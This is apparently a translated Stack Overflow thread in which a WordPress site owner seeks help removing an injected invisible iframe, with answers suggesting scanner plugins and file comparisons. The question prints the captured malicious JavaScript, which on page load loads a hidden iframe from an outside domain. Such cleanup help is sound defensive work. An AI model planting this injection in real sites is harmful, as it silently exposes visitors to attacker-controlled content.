【问题标题】:Find iframe injection and remove from site查找 iframe 注入并从站点中删除
【发布时间】:2015-09-28 05:23:07
【问题描述】:

我浏览了我的网站并注意到以前没有的滚动。

检查后我发现有一个不可见的 iFrame。

在源页面中看到 iframe 后,我查看了所有站点文件,但找不到与源页面中相同的代码行。

我运行我的网站以查找恶意软件,但一切正常。几个月前我确实收到了谷歌的警告,但我的主机删除了恶意文件,谷歌批准了清理工作,现在仍然如此。但现在我看到了这个带有 url 的不可见对象。

源脚本:

<script language="JavaScript">
if(document.loaded) {
  showBrowVer();
} else {
  if (window.addEventListener) {
    window.addEventListener('load', showBrowVer, false);
  } else {
    window.attachEvent('onload', showBrowVer);
  }
}

function showBrowVer() {
  var divTag=document.createElement('div');
  divTag.id='dt';
  document.body.appendChild(divTag);
  var js_kod2 = document.createElement('iframe');
  js_kod2.src = 'http://24corp-shop.com';
  js_kod2.width = '250px';
  js_kod2.height = '320px';
  js_kod2.setAttribute('style','visibility:hidden');
  document.getElementById('dt').appendChild(js_kod2);
}
</script>

我看到它是由wp_head(); 带来的,但我查看了它并没有发现任何可疑之处。

有没有人有关于寻找这种注入以手动将其从我的 WP 站点中删除的提示?

【问题讨论】:

  • 禁用所有插件,看看它是否是其中之一。如果是,则一次激活每个插件,直到它再次出现。
  • 您是在浏览器中看到此代码还是包含在您的 Web 服务器的源代码中?
  • 在浏览器中看到了。我一一停用了所有插件,它仍然存在。
  • 你找到正确答案了吗??

标签: javascript wordpress iframe code-injection malware


【解决方案1】:

免费 WP 主题/插件因使用 base64_encode 在源代码中“隐藏”恶意或不需要的代码而臭名昭著。基本上,它们将编码文本存储在其中一个文件中,然后对其进行 base64_decode 并将结果呈现为 html。我会尝试在源代码中对 base64_decode 进行 greppingsearch 以查看它是否正在完成。

【讨论】:

  • 所以使用下面的插件,我想出了很多base64行。我将如何尝试使用 grepping 搜索 base64?抱歉,我不确定那是什么。
  • 所以我想你已经使用了 Exploit Scanner(因为那是扫描 base64 加密脚本的插件)。你现在唯一能做的就是手动扫描每个base64报告的文件(如果你认为你可以这样做,你应该自己做)。如果您认为自己无法做到这一点,请在此处发布漏洞扫描报告的日志,然后看看我能做什么。尽管您甚至可以使用 GOTMLS 来自动解决您的问题。它集成了一个防病毒软件,可以扫描 shell 脚本并在找到时将其删除。您只需要将您的插件与 GOTMLS 系统连接即可。
  • 我几乎解决了它,或者至少现在解决了。我今天比较了原始的 WP 文件,发现滚动条右侧隐藏了新的代码行。黑客在“主题”、“上传”的几个文件中,主要的麻烦制造者将自己埋在我的 WP 根目录中,隐藏在索引和 info.php 中。太糟糕了,没有一个恶意软件插件能够识别正确的文件。我很高兴它现在结束了。
【解决方案2】:

在这种情况下,wp_head() 本身并未用于传播您网站中的“恶意”代码。该代码不在 wp_head() 上。

1 - 对当前站点进行完整备份(数据库 + 文件) 2 - 停用所有插件并查看恶意代码是否仍然存在。 2 - 如果恶意代码仍然存在,请检查您的主题文件夹。在您的默认主题上转到 functions.php 并在该文件中搜索该代码或 base64 加密代码、eval、包含等。 3 - 如果恶意代码不存在,则在您停用所有插件后,这意味着恶意代码位于其中一个插件上。

使用分治法先找出恶意代码安装在哪个插件上,然后识别出有恶意代码的文件。

【讨论】:

  • 它不是任何插件的一部分。所以你说只是针对这个特定代码逐个文件夹逐个文件处理?我应该尝试在每个文件中找到特定的关键字或短语吗?框架? js_kods?
  • 安装几个插件,帮助您更轻松地找到恶意代码的安装位置。 - 漏洞利用扫描器 (wordpress.org/plugins/exploit-scanner) - GOTMLS (wordpress.org/plugins/gotmls)
  • 很棒的插件。它提出了许多 base64、eval 和 visibility:hidden 行。但没有什么看起来像我的源代码破解线。
  • 刚刚仔细查看了一些站点文件,发现有一行代码一直隐藏在右侧! 这可能是什么?我绝对从来没有把它放在那里。
  • 在我的主题文件夹中的 admin.php 中发现了这个奇怪的代码。查看了我的主题的旧备份,这个文件以前从未在我的备份中。所以我从我的 ftp 中删除了这个文件,但 iframe 仍然没有变化。
【解决方案3】:

我遇到了同样的问题。在主题目录和核心文件中都对许多文件进行了调整。 导致问题的主要原因(iframe 代码在标记之前注入)是根文件夹中的 index.php。 有一个虚假的“eAccelerate”代码注入了编码的 iframe。

我能够使用 WordFence 插件检测到,它给了我被篡改的文件列表。

我正在调查网站是如何被黑的,因为我有最新版本的 WP 和插件,你知道吗?

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 2010-12-01
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2019-05-05
    • 1970-01-01
    • 2021-12-24
    相关资源
    最近更新 更多